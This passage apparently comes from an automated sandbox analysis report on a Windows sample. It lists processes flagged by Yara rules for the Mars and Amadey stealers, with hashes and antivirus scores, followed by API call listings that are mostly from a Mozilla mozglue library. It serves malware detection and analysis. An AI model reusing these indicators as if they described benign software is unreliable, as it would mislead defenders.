                                            • Rule: JoeSecurity_MarsStealer, Description: Yara detected Mars stealer, Source: 0000000B.00000002.1969439309.0000000000121000.00000040.00000001.01000000.0000000E.sdmp, Author: Joe Security
                                            Antivirus matches:
                                            • Detection: 100%, Avira
                                            • Detection: 100%, Joe Sandbox ML
                                            • Detection: 45%, ReversingLabs
                                            Reputation:low
                                            Has exited:true

                                            Target ID:12
                                            Start time:02:27:00
                                            Start date:02/07/2024
                                            Path:C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            Imagebase:0x7c0000
                                            File size:1'867'264 bytes
                                            MD5 hash:93899CE9A453CF1E50E1182DA46190A9
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000C.00000002.2140215620.00000000007C1000.00000040.00000001.01000000.0000000D.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000C.00000003.2099937610.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:low
                                            Has exited:true

                                            Target ID:14
                                            Start time:02:28:00
                                            Start date:02/07/2024
                                            Path:C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            Imagebase:0x7c0000
                                            File size:1'867'264 bytes
                                            MD5 hash:93899CE9A453CF1E50E1182DA46190A9
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000E.00000002.2741394085.00000000007C1000.00000040.00000001.01000000.0000000D.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000E.00000003.2700865655.0000000005270000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:low
                                            Has exited:true

                                            Target ID:15
                                            Start time:02:29:00
                                            Start date:02/07/2024
                                            Path:C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            Imagebase:0x7c0000
                                            File size:1'867'264 bytes
                                            MD5 hash:93899CE9A453CF1E50E1182DA46190A9
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000F.00000003.3299622243.00000000052A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000F.00000002.3339913587.00000000007C1000.00000040.00000001.01000000.0000000D.sdmp, Author: Joe Security
                                            Reputation:low
                                            Has exited:true

                                            Target ID:16
                                            Start time:02:30:00
                                            Start date:02/07/2024
                                            Path:C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            Imagebase:0x7c0000
                                            File size:1'867'264 bytes
                                            MD5 hash:93899CE9A453CF1E50E1182DA46190A9
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000010.00000003.3899911028.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000010.00000002.3940474220.00000000007C1000.00000040.00000001.01000000.0000000D.sdmp, Author: Joe Security
                                            Reputation:low
                                            Has exited:true

                                            Reset < >

                                              Execution Graph

                                              Execution Coverage:0.4%
                                              Dynamic/Decrypted Code Coverage:0%
                                              Signature Coverage:30%
                                              Total number of Nodes:110
                                              Total number of Limit Nodes:12
                                              execution_graph 45578 6c4fb8ae 45579 6c4fb8ba ___scrt_is_nonwritable_in_current_image 45578->45579 45580 6c4fb8e3 dllmain_raw 45579->45580 45581 6c4fb8de 45579->45581 45590 6c4fb8c9 45579->45590 45582 6c4fb8fd dllmain_crt_dispatch 45580->45582 45580->45590 45591 6c4dbed0 DisableThreadLibraryCalls LoadLibraryExW 45581->45591 45582->45581 45582->45590 45584 6c4fb91e 45585 6c4fb94a 45584->45585 45592 6c4dbed0 DisableThreadLibraryCalls LoadLibraryExW 45584->45592 45586 6c4fb953 dllmain_crt_dispatch 45585->45586 45585->45590 45588 6c4fb966 dllmain_raw 45586->45588 45586->45590 45588->45590 45589 6c4fb936 dllmain_crt_dispatch dllmain_raw 45589->45585 45591->45584 45592->45589 45593 6c4fb694 45594 6c4fb6a0 ___scrt_is_nonwritable_in_current_image 45593->45594 45623 6c4faf2a 45594->45623 45596 6c4fb6a7 45597 6c4fb796 45596->45597 45598 6c4fb6d1 45596->45598 45601 6c4fb6ac ___scrt_is_nonwritable_in_current_image 45596->45601 45640 6c4fb1f7 IsProcessorFeaturePresent 45597->45640 45627 6c4fb064 45598->45627 45602 6c4fb6e0 __RTC_Initialize 45602->45601 45630 6c4fbf89 InitializeSListHead 45602->45630 45604 6c4fb6ee ___scrt_initialize_default_local_stdio_options 45606 6c4fb6f3 _initterm_e 45604->45606 45605 6c4fb79d ___scrt_is_nonwritable_in_current_image 45607 6c4fb828 45605->45607 45608 6c4fb7d2 45605->45608 45622 6c4fb7b3 ___scrt_uninitialize_crt __RTC_Initialize 45605->45622 45606->45601 45609 6c4fb708 45606->45609 45610 6c4fb1f7 ___scrt_fastfail 6 API calls 45607->45610 45644 6c4fb09d _execute_onexit_table _cexit ___scrt_release_startup_lock 45608->45644 45631 6c4fb072 45609->45631 45613 6c4fb82f 45610->45613 45618 6c4fb86e dllmain_crt_process_detach 45613->45618 45619 6c4fb83b 45613->45619 45614 6c4fb7d7 45645 6c4fbf95 __std_type_info_destroy_list 45614->45645 45615 6c4fb70d 45615->45601 45617 6c4fb711 _initterm 45615->45617 45617->45601 45621 6c4fb840 45618->45621 45620 6c4fb860 dllmain_crt_process_attach 45619->45620 45619->45621 45620->45621 45624 6c4faf33 45623->45624 45646 6c4fb341 IsProcessorFeaturePresent 45624->45646 45626 6c4faf3f ___scrt_uninitialize_crt 45626->45596 45647 6c4faf8b 45627->45647 45629 6c4fb06b 45629->45602 45630->45604 45632 6c4fb077 ___scrt_release_startup_lock 45631->45632 45633 6c4fb07b 45632->45633 45635 6c4fb082 45632->45635 45657 6c4fb341 IsProcessorFeaturePresent 45633->45657 45637 6c4fb087 _configure_narrow_argv 45635->45637 45636 6c4fb080 45636->45615 45638 6c4fb095 _initialize_narrow_environment 45637->45638 45639 6c4fb092 45637->45639 45638->45636 45639->45615 45641 6c4fb20c ___scrt_fastfail 45640->45641 45642 6c4fb218 memset memset IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 45641->45642 45643 6c4fb302 ___scrt_fastfail 45642->45643 45643->45605 45644->45614 45645->45622 45646->45626 45648 6c4faf9e 45647->45648 45649 6c4faf9a 45647->45649 45650 6c4fb028 45648->45650 45653 6c4fafab ___scrt_release_startup_lock 45648->45653 45649->45629 45651 6c4fb1f7 ___scrt_fastfail 6 API calls 45650->45651 45652 6c4fb02f 45651->45652 45654 6c4fafb8 _initialize_onexit_table 45653->45654 45656 6c4fafd6 45653->45656 45655 6c4fafc7 _initialize_onexit_table 45654->45655 45654->45656 45655->45656 45656->45629 45657->45636 45658 1173b8c 45660 1173b99 VirtualAlloc 45658->45660 45661 6c4c35a0 45662 6c4c35c4 InitializeCriticalSectionAndSpinCount getenv 45661->45662 45677 6c4c3846 __aulldiv 45661->45677 45663 6c4c38fc strcmp 45662->45663 45668 6c4c35f3 __aulldiv 45662->45668 45666 6c4c3912 strcmp 45663->45666 45663->45668 45665 6c4c38f4 45666->45668 45667 6c4c35f8 QueryPerformanceFrequency 45667->45668 45668->45667 45669 6c4c3622 _strnicmp 45668->45669 45671 6c4c3944 _strnicmp 45668->45671 45673 6c4c375c 45668->45673 45674 6c4c395d 45668->45674 45675 6c4c3664 GetSystemTimeAdjustment 45668->45675 45669->45668 45669->45671 45670 6c4c376a QueryPerformanceCounter EnterCriticalSection 45672 6c4c37b3 LeaveCriticalSection QueryPerformanceCounter EnterCriticalSection 45670->45672 45670->45673 45671->45668 45671->45674 45672->45673 45676 6c4c37fc LeaveCriticalSection 45672->45676 45673->45670 45673->45672 45673->45676 45673->45677 45675->45668 45676->45673 45676->45677 45678 6c4fb320 5 API calls ___raise_securityfailure 45677->45678 45678->45665 45679 6c4c3060 ?Startup@TimeStamp@mozilla@ ?Now@TimeStamp@mozilla@@CA?AV12@_N ?InitializeUptime@mozilla@ 45684 6c4fab2a 45679->45684 45683 6c4c30db 45688 6c4fae0c _crt_atexit _register_onexit_function 45684->45688 45686 6c4c30cd 45687 6c4fb320 5 API calls ___raise_securityfailure 45686->45687 45687->45683 45688->45686 45689 6c4dc930 GetSystemInfo VirtualAlloc 45690 6c4dc9a3 GetSystemInfo 45689->45690 45691 6c4dc973 45689->45691 45692 6c4dc9b6 45690->45692 45693 6c4dc9d0 45690->45693 45705 6c4fb320 5 API calls ___raise_securityfailure 45691->45705 45692->45693 45695 6c4dc9bd 45692->45695 45693->45691 45696 6c4dc9d8 VirtualAlloc 45693->45696 45695->45691 45698 6c4dc9c1 VirtualFree 45695->45698 45699 6c4dc9ec 45696->45699 45700 6c4dc9f0 45696->45700 45697 6c4dc99b 45698->45691 45699->45691 45706 6c4fcbe8 GetCurrentProcess TerminateProcess 45700->45706 45705->45697 45707 6c4fb9c0 45708 6c4fb9ce dllmain_dispatch 45707->45708 45709 6c4fb9c9 45707->45709 45711 6c4fbef1 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___get_entropy 45709->45711 45711->45708

                                              Control-flow Graph

                                              APIs
                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(6C54F688,00001000), ref: 6C4C35D5
                                              • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C4C35E0
                                              • QueryPerformanceFrequency.KERNEL32(?), ref: 6C4C35FD
                                              • _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C4C363F
                                              • GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C4C369F
                                              • __aulldiv.LIBCMT ref: 6C4C36E4
                                              • QueryPerformanceCounter.KERNEL32(?), ref: 6C4C3773
                                              • EnterCriticalSection.KERNEL32(6C54F688), ref: 6C4C377E
                                              • LeaveCriticalSection.KERNEL32(6C54F688), ref: 6C4C37BD
                                              • QueryPerformanceCounter.KERNEL32(?), ref: 6C4C37C4
                                              • EnterCriticalSection.KERNEL32(6C54F688), ref: 6C4C37CB
                                              • LeaveCriticalSection.KERNEL32(6C54F688), ref: 6C4C3801
                                              • __aulldiv.LIBCMT ref: 6C4C3883
                                              • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,QPC), ref: 6C4C3902
                                              • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,GTC), ref: 6C4C3918
                                              • _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,AuthcAMDenti,0000000C), ref: 6C4C394C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: CriticalSection$PerformanceQuery$CounterEnterLeave__aulldiv_strnicmpstrcmp$AdjustmentCountFrequencyInitializeSpinSystemTimegetenv
                                              • String ID: AuthcAMDenti$GTC$GenuntelineI$MOZ_TIMESTAMP_MODE$QPC
                                              • API String ID: 301339242-3790311718
                                              • Opcode ID: e3d4d48b9bd52e6d82054f9df9eaa9e452c3f1d30789d0c7f3a7d4118a931cab
                                              • Instruction ID: 2cd603c75a26bc1f679c0c4ae12f240a3b0010815c277e30061809d8fb0f437a
                                              • Opcode Fuzzy Hash: e3d4d48b9bd52e6d82054f9df9eaa9e452c3f1d30789d0c7f3a7d4118a931cab
                                              • Instruction Fuzzy Hash: 74B1B675B093109BDB08EF2CCC44B5AB7F5AB89708F06CA2DE899D7760D77098058B96

                                              Control-flow Graph

                                              APIs
                                              • GetSystemInfo.KERNEL32(?), ref: 6C4DC947
                                              • VirtualAlloc.KERNEL32(?,?,00002000,00000001), ref: 6C4DC969
                                              • GetSystemInfo.KERNEL32(?), ref: 6C4DC9A9
                                              • VirtualFree.KERNEL32(00000000,?,00008000), ref: 6C4DC9C8
                                              • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001), ref: 6C4DC9E2
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: Virtual$AllocInfoSystem$Free
                                              • String ID:
                                              • API String ID: 4191843772-0
                                              • Opcode ID: 2ba210eec416d4ad4eaf9da3e991b88bf1933fa561e47bee250c337134ab826a
                                              • Instruction ID: 01c430d7059a47f874c20fd3fa97299db7a59418d70b941d165fd8fd3a6ad8c3
                                              • Opcode Fuzzy Hash: 2ba210eec416d4ad4eaf9da3e991b88bf1933fa561e47bee250c337134ab826a
                                              • Instruction Fuzzy Hash: 7521F931741614ABDB15FA28DC94FAE73B9EB86748F62411EF907A7B80EB706C048794

                                              Control-flow Graph

                                              APIs
                                              • ?Startup@TimeStamp@mozilla@@SAXXZ.MOZGLUE ref: 6C4C3095
                                                • Part of subcall function 6C4C35A0: InitializeCriticalSectionAndSpinCount.KERNEL32(6C54F688,00001000), ref: 6C4C35D5
                                                • Part of subcall function 6C4C35A0: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C4C35E0
                                                • Part of subcall function 6C4C35A0: QueryPerformanceFrequency.KERNEL32(?), ref: 6C4C35FD
                                                • Part of subcall function 6C4C35A0: _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C4C363F
                                                • Part of subcall function 6C4C35A0: GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C4C369F
                                                • Part of subcall function 6C4C35A0: __aulldiv.LIBCMT ref: 6C4C36E4
                                              • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C4C309F
                                                • Part of subcall function 6C4E5B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6C4E56EE,?,00000001), ref: 6C4E5B85
                                                • Part of subcall function 6C4E5B50: EnterCriticalSection.KERNEL32(6C54F688,?,?,?,6C4E56EE,?,00000001), ref: 6C4E5B90
                                                • Part of subcall function 6C4E5B50: LeaveCriticalSection.KERNEL32(6C54F688,?,?,?,6C4E56EE,?,00000001), ref: 6C4E5BD8
                                                • Part of subcall function 6C4E5B50: GetTickCount64.KERNEL32 ref: 6C4E5BE4
                                              • ?InitializeUptime@mozilla@@YAXXZ.MOZGLUE ref: 6C4C30BE
                                                • Part of subcall function 6C4C30F0: QueryUnbiasedInterruptTime.KERNEL32 ref: 6C4C3127
                                                • Part of subcall function 6C4C30F0: __aulldiv.LIBCMT ref: 6C4C3140
                                                • Part of subcall function 6C4FAB2A: __onexit.LIBCMT ref: 6C4FAB30
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: Time$CriticalQuerySection$InitializePerformanceStamp@mozilla@@__aulldiv$AdjustmentCountCount64CounterEnterFrequencyInterruptLeaveNow@SpinStartup@SystemTickUnbiasedUptime@mozilla@@V12@___onexit_strnicmpgetenv
                                              • String ID:
                                              • API String ID: 4291168024-0
                                              • Opcode ID: 0e02c681bd0d315c743814793bbf582c9eef4c2fc5597f2428c19ae72597731e
                                              • Instruction ID: 8d4380505eff654bbee96c99c63c862932c0d7c647bf440df7fbfd332d60cf26
                                              • Opcode Fuzzy Hash: 0e02c681bd0d315c743814793bbf582c9eef4c2fc5597f2428c19ae72597731e
                                              • Instruction Fuzzy Hash: 93F0F922E2074496CB10FF389C41AE6B770EF6B31CF12931DE85953561FB2061D883CA

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 153 1173b8c-1173b97 154 1173ba0-1173ba3 153->154 155 1173b99-1173b9e 153->155 156 1173baa-1173bbe VirtualAlloc 154->156 157 1173ba5 154->157 155->156 157->156
                                              APIs
                                              • VirtualAlloc.KERNEL32(?,?,?,?), ref: 01173BB7
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1850057063.0000000001166000.00000040.00000001.01000000.00000003.sdmp, Offset: 0101C000, based on PE: true
                                              • Associated: 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1850057063.000000000114C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1850057063.0000000001191000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1850057063.00000000011F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1850057063.0000000001502000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_de0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID:
                                              • API String ID: 4275171209-0
                                              • Opcode ID: 57c7dd44c9e5333d34795f3e4df765483dcef2f14c54577891cb428b3bb79fcb
                                              • Instruction ID: fd072fe3ab94d320b5221e1c3a6dd50b64ba4b38008b9b75842fd10448b1def7
                                              • Opcode Fuzzy Hash: 57c7dd44c9e5333d34795f3e4df765483dcef2f14c54577891cb428b3bb79fcb
                                              • Instruction Fuzzy Hash: 99E0EC7531010C9BDB54CD5CD844B6B33AEF788211F148011F519D7305C234E951A7A1

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 333 1112e84-1112e93 call 1022d28 336 1112e98-1112e9d call 102ba50 333->336 338 1112ea2-1112ea5 336->338 339 1112eab-1112eb9 338->339 340 1112f2e-1112f31 338->340 343 1112ebb-1112ec9 call 107df44 339->343 344 1112f2c 339->344 341 1112f33-1112f3d call 1112c64 340->341 342 1112f3f-1112f41 340->342 341->342 342->336 343->344 349 1112ecb-1112eed call 1022d28 343->349 344->340 352 1112f07-1112f15 349->352 353 1112eef-1112f05 349->353 352->344 354 1112f17-1112f27 call 1113640 352->354 353->352 354->344
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1850057063.000000000101C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                              • Associated: 00000000.00000002.1850028493.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1850057063.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1850057063.0000000000E28000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1850057063.0000000000E86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1850057063.0000000000F2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1850057063.0000000001005000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1850057063.0000000001017000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1850057063.000000000114C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1850057063.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1850057063.0000000001191000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1850057063.00000000011F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1850057063.0000000001502000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1850057063.00000000017A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_de0000_SecuriteInfo.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: bae27eab742b0657a22ec36301511e74045473f3a8d79f774c5112cdcab15733
                                              • Instruction ID: 4b7f8b6911806acaf3f13db58c5a706ccf1fe078fea5dbda944913f3d0a1132e
                                              • Opcode Fuzzy Hash: bae27eab742b0657a22ec36301511e74045473f3a8d79f774c5112cdcab15733
                                              • Instruction Fuzzy Hash: 67118F34701212CBE32EEF69D4C4A95F797AB8A304F648271D9548739CDB70AC86CB55
                                              APIs
                                              • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING), ref: 6C4D5492
                                              • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C4D54A8
                                              • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C4D54BE
                                              • __Init_thread_footer.LIBCMT ref: 6C4D54DB
                                                • Part of subcall function 6C4FAB3F: EnterCriticalSection.KERNEL32(6C54E370,?,?,6C4C3527,6C54F6CC,?,?,?,?,?,?,?,?,6C4C3284), ref: 6C4FAB49
                                                • Part of subcall function 6C4FAB3F: LeaveCriticalSection.KERNEL32(6C54E370,?,6C4C3527,6C54F6CC,?,?,?,?,?,?,?,?,6C4C3284,?,?,6C4E56F6), ref: 6C4FAB7C
                                                • Part of subcall function 6C4FCBE8: GetCurrentProcess.KERNEL32(?,6C4C31A7), ref: 6C4FCBF1
                                                • Part of subcall function 6C4FCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C4C31A7), ref: 6C4FCBFA
                                              • GetCurrentThreadId.KERNEL32 ref: 6C4D54F9
                                              • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_HELP), ref: 6C4D5516
                                              • GetCurrentThreadId.KERNEL32 ref: 6C4D556A
                                              • AcquireSRWLockExclusive.KERNEL32(6C54F4B8), ref: 6C4D5577
                                              • moz_xmalloc.MOZGLUE(00000070), ref: 6C4D5585
                                              • ?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ.MOZGLUE(00000000,00000001), ref: 6C4D5590
                                              • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP,?,00000001), ref: 6C4D55E6
                                              • ReleaseSRWLockExclusive.KERNEL32(6C54F4B8), ref: 6C4D5606
                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C4D5616
                                                • Part of subcall function 6C4FAB89: EnterCriticalSection.KERNEL32(6C54E370,?,?,?,6C4C34DE,6C54F6CC,?,?,?,?,?,?,?,6C4C3284), ref: 6C4FAB94
                                                • Part of subcall function 6C4FAB89: LeaveCriticalSection.KERNEL32(6C54E370,?,6C4C34DE,6C54F6CC,?,?,?,?,?,?,?,6C4C3284,?,?,6C4E56F6), ref: 6C4FABD1
                                              • GetCurrentThreadId.KERNEL32 ref: 6C4D563E
                                              • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C4D5646
                                              • exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000), ref: 6C4D567C
                                              • free.MOZGLUE(?), ref: 6C4D56AE
                                                • Part of subcall function 6C4E5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C4E5EDB
                                                • Part of subcall function 6C4E5E90: memset.VCRUNTIME140(ewRl,000000E5,?), ref: 6C4E5F27
                                                • Part of subcall function 6C4E5E90: LeaveCriticalSection.KERNEL32(?), ref: 6C4E5FB2
                                              • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_NO_BASE), ref: 6C4D56E8
                                              • GetCurrentThreadId.KERNEL32 ref: 6C4D5707
                                              • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00000001), ref: 6C4D570F
                                              • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_ENTRIES), ref: 6C4D5729
                                              • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_DURATION), ref: 6C4D574E
                                              • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_INTERVAL), ref: 6C4D576B
                                              • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_FEATURES_BITFIELD), ref: 6C4D5796
                                              • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_FEATURES), ref: 6C4D57B3
                                              • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_FILTERS), ref: 6C4D57CA
                                              Strings
                                              • [I %d/%d] - MOZ_PROFILER_STARTUP is set, xrefs: 6C4D5717
                                              • [I %d/%d] - MOZ_PROFILER_STARTUP_ENTRIES = %u, xrefs: 6C4D5C56
                                              • - MOZ_PROFILER_STARTUP_ENTRIES not a valid integer: %s, xrefs: 6C4D5D24
                                              • MOZ_PROFILER_STARTUP_DURATION, xrefs: 6C4D5749
                                              • MOZ_PROFILER_STARTUP_FILTERS, xrefs: 6C4D57C5
                                              • MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6C4D54A3
                                              • MOZ_PROFILER_STARTUP_FEATURES, xrefs: 6C4D57AE
                                              • MOZ_PROFILER_STARTUP_FEATURES_BITFIELD, xrefs: 6C4D5791
                                              • MOZ_PROFILER_STARTUP_NO_BASE, xrefs: 6C4D56E3
                                              • - MOZ_PROFILER_STARTUP_INTERVAL not a valid float: %s, xrefs: 6C4D5D01
                                              • [I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES = %d, xrefs: 6C4D584E
                                              • [I %d/%d] - MOZ_PROFILER_STARTUP_FILTERS = %s, xrefs: 6C4D5B38
                                              • [I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES_BITFIELD = %d, xrefs: 6C4D5AC9
                                              • MOZ_PROFILER_STARTUP_ENTRIES, xrefs: 6C4D5724
                                              • MOZ_BASE_PROFILER_HELP, xrefs: 6C4D5511
                                              • MOZ_PROFILER_STARTUP_INTERVAL, xrefs: 6C4D5766
                                              • MOZ_BASE_PROFILER_LOGGING, xrefs: 6C4D54B9
                                              • MOZ_PROFILER_STARTUP, xrefs: 6C4D55E1
                                              • GeckoMain, xrefs: 6C4D5554, 6C4D55D5
                                              • [I %d/%d] -> This process is excluded and won't be profiled, xrefs: 6C4D5BBE
                                              • - MOZ_PROFILER_STARTUP_ENTRIES unit must be one of the following: KB, KiB, MB, MiB, GB, GiB, xrefs: 6C4D5D2B
                                              • - MOZ_PROFILER_STARTUP_DURATION not a valid float: %s, xrefs: 6C4D5CF9
                                              • - MOZ_PROFILER_STARTUP_FEATURES_BITFIELD not a valid integer: %s, xrefs: 6C4D5D1C
                                              • MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6C4D548D
                                              • [I %d/%d] profiler_init, xrefs: 6C4D564E
                                              Memory Dump Source
